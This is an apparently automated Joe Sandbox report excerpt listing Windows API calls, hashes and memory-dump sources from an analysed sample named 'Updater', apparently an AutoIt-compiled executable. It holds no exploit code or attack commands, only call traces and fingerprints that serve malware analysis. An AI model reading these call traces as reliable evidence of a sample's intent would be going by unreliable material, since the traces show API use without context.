                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                  • API String ID: 4137639002-1221869570
                                                                                                  • Opcode ID: c55dfd2ca922db52470cb4302db7a7b8c2052b9d98d8f4f500edbfb5d0adc9e0
                                                                                                  • Instruction ID: ef27ef0305c150154ed0a331026a4eaaea80a122f8e2656f76624e38457eaf88
                                                                                                  • Opcode Fuzzy Hash: c55dfd2ca922db52470cb4302db7a7b8c2052b9d98d8f4f500edbfb5d0adc9e0
                                                                                                  • Instruction Fuzzy Hash: 4F81AF71A04201EFCB10DF24C484AAAB7E5EF89354F04896DFC4A8B351D775ED49CB85
                                                                                                  APIs
                                                                                                  • IsWindow.USER32(014155A0), ref: 007688F4
                                                                                                  • IsWindowEnabled.USER32(014155A0), ref: 00768900
                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007689E4
                                                                                                  • SendMessageW.USER32(014155A0,000000B0,?,?), ref: 00768A1B
                                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00768A58
                                                                                                  • GetWindowLongW.USER32(014155A0,000000EC), ref: 00768A7A
                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00768A92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                  • String ID:
                                                                                                  • API String ID: 4072528602-0
                                                                                                  • Opcode ID: c7767a5bcb14ff9d38425d7f07df36d765632367067b280d88e24b35c840cb07
                                                                                                  • Instruction ID: 8b97c95798513660e1e316efad8a19abc91b3ab70f7219e4809c6656891e822b
                                                                                                  • Opcode Fuzzy Hash: c7767a5bcb14ff9d38425d7f07df36d765632367067b280d88e24b35c840cb07
                                                                                                  • Instruction Fuzzy Hash: 55716A34A04305AFDB609FA4C894FBABBA5EF49300F14425AFD4797252CB79BC51DB12
                                                                                                  APIs
                                                                                                  • GetMenu.USER32(?), ref: 00762AA5
                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00762AD7
                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00762AFF
                                                                                                  • _wcslen.LIBCMT ref: 00762B35
                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00762B6F
                                                                                                  • GetSubMenu.USER32(?,?), ref: 00762B7D
                                                                                                    • Part of subcall function 00733E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00733EB2
                                                                                                    • Part of subcall function 00733E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733EC3
                                                                                                    • Part of subcall function 00733E94: GetCurrentThreadId.KERNEL32 ref: 00733ECA
                                                                                                    • Part of subcall function 00733E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,0073368B), ref: 00733ED1
                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00762C05
                                                                                                    • Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Thread$ItemMessage$AttachCountCurrentInputPostProcessSendSleepStringTimeoutWindow_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3648899353-0
                                                                                                  • Opcode ID: bdd781207ffff4bf242348170de7392632876ceee57062e0ad3dc4c1cb6fd6e5
                                                                                                  • Instruction ID: 0f09e8bde226f2597063f7c5fcf09905223cfe856aaec8af0823315bf9814b3f
                                                                                                  • Opcode Fuzzy Hash: bdd781207ffff4bf242348170de7392632876ceee57062e0ad3dc4c1cb6fd6e5
                                                                                                  • Instruction Fuzzy Hash: A9718E75E00615AFCB50DF64C845AAEB7F5EF48310F148459ED1AEB342DB78AE428B90
                                                                                                  APIs
                                                                                                    • Part of subcall function 0073EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073DCD6,?), ref: 0073EC50
                                                                                                    • Part of subcall function 0073EC33: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0073DCD6,?), ref: 0073EC69
                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0073F29C
                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0073F2B7
                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0073F2E6
                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0073F31B
                                                                                                  • _wcslen.LIBCMT ref: 0073F454
                                                                                                  • _wcslen.LIBCMT ref: 0073F46C
                                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0073F4B9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 4252263244-0
                                                                                                  • Opcode ID: 8c0f55dd95786f80da45e63fa5853e3e2573acd1b0a0b2d38126dd969ea1fe7c
                                                                                                  • Instruction ID: 5b740bcc385ddd13e7de94d8642bce20eb27111171b63e58b38bf2e130ad7b69
                                                                                                  • Opcode Fuzzy Hash: 8c0f55dd95786f80da45e63fa5853e3e2573acd1b0a0b2d38126dd969ea1fe7c
                                                                                                  • Instruction Fuzzy Hash: F75185B19083849BD764DBA4D8859DF73DCAF84350F40492FF689C3192EF78E5488766
                                                                                                  APIs
                                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007059D1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0070529E
                                                                                                  • __fassign.LIBCMT ref: 00705319
                                                                                                  • __fassign.LIBCMT ref: 00705334
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0070535A
                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,007059D1,00000000,?,?,?,?,?,?,?,?,?,007059D1,?), ref: 00705379
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,007059D1,00000000,?,?,?,?,?,?,?,?,?,007059D1,?), ref: 007053B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1324828854-0
                                                                                                  • Opcode ID: 419fc5771b4189929147d0f3e611ead623fc2ba8158de3f8f3e944fc7484fb2f
                                                                                                  • Instruction ID: 2aaeb75f1dff57dca4949be126e511faa2f77ffc8a7ab31952bf7e194f0edf54
                                                                                                  • Opcode Fuzzy Hash: 419fc5771b4189929147d0f3e611ead623fc2ba8158de3f8f3e944fc7484fb2f
                                                                                                  • Instruction Fuzzy Hash: B9517E71A00649DFDB10CFA8D845AEFBBF8EF09300F14425AE955E7291E7B49A41CB64
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00738629
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0073864F
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00738652
                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00738670
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00738679
                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0073869E
                                                                                                  • SysAllocString.OLEAUT32(?), ref: 007386AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                  • String ID:
                                                                                                  • API String ID: 3761583154-0
                                                                                                  • Opcode ID: 744fba22a652fe00eafb322177fde2be83dff0869ecd9aa9696bcc5d8710ad0c
                                                                                                  • Instruction ID: 9d54c1fa671a4b55cbcddaed263fb3f117dd93308652503528f92fe19e08eda3
                                                                                                  • Opcode Fuzzy Hash: 744fba22a652fe00eafb322177fde2be83dff0869ecd9aa9696bcc5d8710ad0c
                                                                                                  • Instruction Fuzzy Hash: 8021D672604309EFAF50DFA8CC85CBA77ACEB08364B048125FE15DB252DA78DC418755
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00738704
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0073872A
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0073872D
                                                                                                  • SysAllocString.OLEAUT32 ref: 0073874E
                                                                                                  • SysFreeString.OLEAUT32 ref: 00738757
                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00738771
                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0073877F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                  • String ID:
                                                                                                  • API String ID: 3761583154-0
                                                                                                  • Opcode ID: e6e4a0a755827695bc43ab98d0592c737384509f0d807a0f64955d7acac1dfae
                                                                                                  • Instruction ID: ced0ebaf1fe5fd48de0a8430154af7b1b7f44493ba94405c093c0a6b6e4344c7
                                                                                                  • Opcode Fuzzy Hash: e6e4a0a755827695bc43ab98d0592c737384509f0d807a0f64955d7acac1dfae
                                                                                                  • Instruction Fuzzy Hash: 4221A775604314AFAB509FE8CC89DBA77EDEB09360B148125F905CB262DF78EC41C765
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00741350
                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00741383
                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00741395
                                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007413CF
                                                                                                  • CloseHandle.KERNEL32(?), ref: 007413F3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Handle$Create$CloseFilePipe
                                                                                                  • String ID: nul
                                                                                                  • API String ID: 3408351469-2873401336
                                                                                                  • Opcode ID: 99447bc4b0a5da911c27c3356906e7e439e5f99b9c454b9a986249f7b15067b1
                                                                                                  • Instruction ID: 8cb0c13de674325beafd0a59d1a9dc03bac2065f7b404a56b1790e168fa80180
                                                                                                  • Opcode Fuzzy Hash: 99447bc4b0a5da911c27c3356906e7e439e5f99b9c454b9a986249f7b15067b1
                                                                                                  • Instruction Fuzzy Hash: F9216070A0030AEFDB30AF69DC05A9A7BE8FF55760F604A19F9A1D72D0E7749890CB50
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00741424
                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00741456
                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00741467
                                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007414A1
                                                                                                  • CloseHandle.KERNEL32(?), ref: 007414C5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Handle$Create$CloseFilePipe
                                                                                                  • String ID: nul
                                                                                                  • API String ID: 3408351469-2873401336
                                                                                                  • Opcode ID: bf05ac8441136ff32ae841377faaeb41916cb75a03a957922824912d55461b78
                                                                                                  • Instruction ID: 1de7dbc3ee9aafb4cacecfbfcfe34b0c400122ad5da8211716ae4f3461fc093d
                                                                                                  • Opcode Fuzzy Hash: bf05ac8441136ff32ae841377faaeb41916cb75a03a957922824912d55461b78
                                                                                                  • Instruction Fuzzy Hash: 0421817560034A9FDB30AFADDC04A99B7E8BF55760F604B19F9A1E32D0D7B89890CB50
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E4570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006E45AE
                                                                                                    • Part of subcall function 006E4570: GetStockObject.GDI32(00000011), ref: 006E45C2
                                                                                                    • Part of subcall function 006E4570: SendMessageW.USER32(00000000,00000030,00000000), ref: 006E45CC
                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00764ACB
                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00764AD8
                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00764AE3
                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00764AF2
                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00764AFE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                  • String ID: Msctls_Progress32
                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                  • Opcode ID: ae7c25d3ebdfe766e3b3536c2b25680edc9885648804bda214e95b4ed146016e
                                                                                                  • Instruction ID: 931443d5cef22dc893bff1c498b6696528663b651537dc56e825784f5867816a
                                                                                                  • Opcode Fuzzy Hash: ae7c25d3ebdfe766e3b3536c2b25680edc9885648804bda214e95b4ed146016e
                                                                                                  • Instruction Fuzzy Hash: 201186B1250219BEEF115F64DC85EE77FADEF09798F018111BA48A7090C675DC21DBA4
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 2929853658-0
                                                                                                  • Opcode ID: acd2ea49cf299b89b64f17ab4c84d32e9c7a8468b9dcd93b7b969ff5bf17de5c
                                                                                                  • Instruction ID: 6d5bb6321aed56549f76326f9c237d8aae6cda14fde6371c223a9bb0a44b9d7a
                                                                                                  • Opcode Fuzzy Hash: acd2ea49cf299b89b64f17ab4c84d32e9c7a8468b9dcd93b7b969ff5bf17de5c
                                                                                                  • Instruction Fuzzy Hash: CC114C72540B04EAEA30BBB0CC5FFCB77DCAF00704F400A15B7A9A60D3DE69B9159661
                                                                                                  APIs
                                                                                                    • Part of subcall function 014A6EC5: VirtualQuery.KERNEL32(?,?,0000001C), ref: 014A6EE1
                                                                                                    • Part of subcall function 014A6EC5: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 014A6F05
                                                                                                    • Part of subcall function 014A6EC5: GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A6F20
                                                                                                    • Part of subcall function 014A6EC5: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 014A6FC4
                                                                                                  • CharToOemA.USER32(?,?), ref: 014A7094
                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 014A70B1
                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 014A70B7
                                                                                                  • GetStdHandle.KERNEL32(000000F4,014A7121,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 014A70CC
                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,014A7121,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 014A70D2
                                                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 014A70F4
                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 014A710A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 185507032-0
                                                                                                  • Opcode ID: 2c00040a03add7d63feb164a6b7650cd9dfedee44a0f1c8c7e23f53f15a82750
                                                                                                  • Instruction ID: 7e0d31d4969a769cf1b10f897b6fbfcd66d2f0acbab630ccdaae77f53070bb2d
                                                                                                  • Opcode Fuzzy Hash: 2c00040a03add7d63feb164a6b7650cd9dfedee44a0f1c8c7e23f53f15a82750
                                                                                                  • Instruction Fuzzy Hash: 9C1151B5108206AAD710F7A5CC85F9B77EC9B74700F814A2FB354D60F0DA75D9049762
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0073E86E
                                                                                                  • LoadStringW.USER32(00000000), ref: 0073E875
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0073E88B
                                                                                                  • LoadStringW.USER32(00000000), ref: 0073E892
                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0073E8D6
                                                                                                  Strings
                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0073E8B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                  • API String ID: 4072794657-3128320259
                                                                                                  • Opcode ID: f4a78c2ba7e6a63f0c685abd309cc218383f2edaef8aa4b815b174d5768beb30
                                                                                                  • Instruction ID: 347bae392f28d917b5a3d594fb077d6b3978b08cad6a6121097be5ea4a4b6b45
                                                                                                  • Opcode Fuzzy Hash: f4a78c2ba7e6a63f0c685abd309cc218383f2edaef8aa4b815b174d5768beb30
                                                                                                  • Instruction Fuzzy Hash: E301FFF6E103097FE720A794DD89EE7776CE708301F4045A5FB4AE2052EAB85E844B75
                                                                                                  APIs
                                                                                                  • GetClientRect.USER32(?,?), ref: 006E4614
                                                                                                  • GetWindowRect.USER32(?,?), ref: 006E4655
                                                                                                  • ScreenToClient.USER32(?,?), ref: 006E467D
                                                                                                  • GetClientRect.USER32(?,?), ref: 006E47BD
                                                                                                  • GetWindowRect.USER32(?,?), ref: 006E47DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1296646539-0
                                                                                                  • Opcode ID: f09d24fb9f34cf8b04eff53eb0d6476a1e0077b4367123acd796b32bea42c33f
                                                                                                  • Instruction ID: fc8e2cb3d00381ae7f6d110ecb0445b4c0e5c9250c0f3d41ccc4d36a51c227ce
                                                                                                  • Opcode Fuzzy Hash: f09d24fb9f34cf8b04eff53eb0d6476a1e0077b4367123acd796b32bea42c33f
                                                                                                  • Instruction Fuzzy Hash: 0DB16838A1138ADBDB14CFB9C4407EAB7F2FF58310F14851AE8A9D3250DB34A951DB95
                                                                                                  APIs
                                                                                                    • Part of subcall function 00753C99: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00751BEC,00000000,?,?,00000000), ref: 00753CE5
                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0075299C
                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007529BD
                                                                                                  • WSAGetLastError.WSOCK32 ref: 007529CE
                                                                                                  • inet_ntoa.WSOCK32(?), ref: 00752A68
                                                                                                  • htons.WSOCK32(?), ref: 00752AB7
                                                                                                  • _strlen.LIBCMT ref: 00752B11
                                                                                                    • Part of subcall function 00734A80: _strlen.LIBCMT ref: 00734A8A
                                                                                                    • Part of subcall function 006EF3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,00008000,?,00000000,00000000,00000000,?,00008000,00008000,?,0073D9C7,00008000,?,?), ref: 006EF402
